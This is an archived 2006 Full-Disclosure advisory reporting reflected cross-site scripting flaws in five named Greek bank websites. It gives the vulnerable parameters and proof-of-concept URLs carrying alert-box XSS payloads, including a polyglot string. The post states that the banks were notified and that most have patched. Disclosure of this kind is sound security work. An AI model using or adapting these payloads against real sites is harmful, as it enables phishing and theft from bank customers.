lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <000e01c6dc82$49595bd0$0d00a8c0@MKandias>
Date: Wed, 20 Sep 2006 09:59:15 +0300
From: "Sentinel" <info@...tinel.gr>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Cross Site Scripting at Several Greek Banks.

                      Sentinel Computer Security Advisory


Sentinel Co.
http://www.sentinel.gr
info@...tinel.gr


General Flaw Description : Cross Site Scripting Vulnerabilities in multiple
                           Greek Web Banking sites.
-------------------------------------------------------------------------------
                             Advisory Information
-------------------------------------------------------------------------------
Advisory Release Date : 2006/09/01
Advisory ID : SGA-0002
Extends : None
Deprecates : None
-------------------------------------------------------------------------------
                             Product Information
-------------------------------------------------------------------------------
Flawed File Name : http://www.eurobank.gr/online/home/pops.aspx,
                   http://www.winbank.gr/eCPage.asp,
                   http://www.emporiki.gr/cbg/gr/search/search.jsp,
                   http://www.piraeusbank.gr/ecportal.asp,
                   http://www.probank.gr/search/index.php
-------------------------------------------------------------------------------
                          Vulnerability Information
-------------------------------------------------------------------------------
Flaw Type : Cross Site Scripting
Vulnerability Impact : Phising and Scam attacks
Vulnerability Rating : Critical
Patch Status : Partially Patched
Advisory Status : Verified
Publicity Level : Published
Other Advisories IDs : None
Flaw Discovery Date : 2006/08/31
Patch Date : 2006/09/02
Vulnerability Credit : Emmanouil Gavriil (egavriil@...tinel.gr)
Exploit Status : Not Released
Exploit Publication Date : None
-------------------------------------------------------------------------------


Description
-----------

Many Greek banks are using Web Banking service to assist their customers with 
their transactions. Eurobank, Winbank, Pireaus Bank, Probank and Emporiki Bank 
found to be vulnerable to Cross Site Scripting Attacks which can lead to 
execution of arbitrary SCRIPT and HTML code to the user. 


Technical Information
---------------------

www.eurobank.gr is making use of multiple aspx files which fail to sanitise
variables. Most of aspx files in Eurobank website which are getting variables
as input are vulnerable to XSS.

www.winbank.gr is using a search function which does not properly sanitise the
input of variable text_search.

www.emporiki.gr is using a jsp search function which does not properly sanitise
the input of variable searchFld.

www.piraeusbank.gr is having exactly the same problem with Winbank as it is
actually the same bank. Even though it doesn't have a Web Banking System
itself, it forwards Web Banking requests to winbank. Cross Site Scripting
is possible, and thus the danger is the same, as an unsuspicious user can be
lead from www.piraeusbank.gr with a valid redirection to a fake www.winbank.gr
login screen.

www.probank.gr doesn't have a Web Banking Service but the site is vulnerable
to XSS and while account compromise is not possible, valuable information such
as CARD and PIN numbers can be stolen through phising/scam attacks.


Proof of Concept Experiment
---------------------------

http://www.eurobank.gr/online/home/pops.aspx?';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}

http://www.winbank.gr/eCPage.asp?Page=eCFullSearchResults.asp&lang=1&text_search=%3Cscript%3Ealert('XSS')%3C/script%3E

http://www.emporiki.gr/cbg/gr/search/search.jsp?searchFld=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}

http://www.piraeusbank.gr/ecportal.asp?id=235212&nt=107&pageno=1&fromsearch=234010&lang=2&tid=&txtSearch=%3Cscript%3Ealert('XSS')%3C/script%3E

http://www.probank.gr/search/index.php?qu=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}


Patch Description and Information
---------------------------------

Banks informed. All banks except Emporiki Bank have fixed the vulnerability.


References and Other Resources for Information
----------------------------------------------

None.

EOF.

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ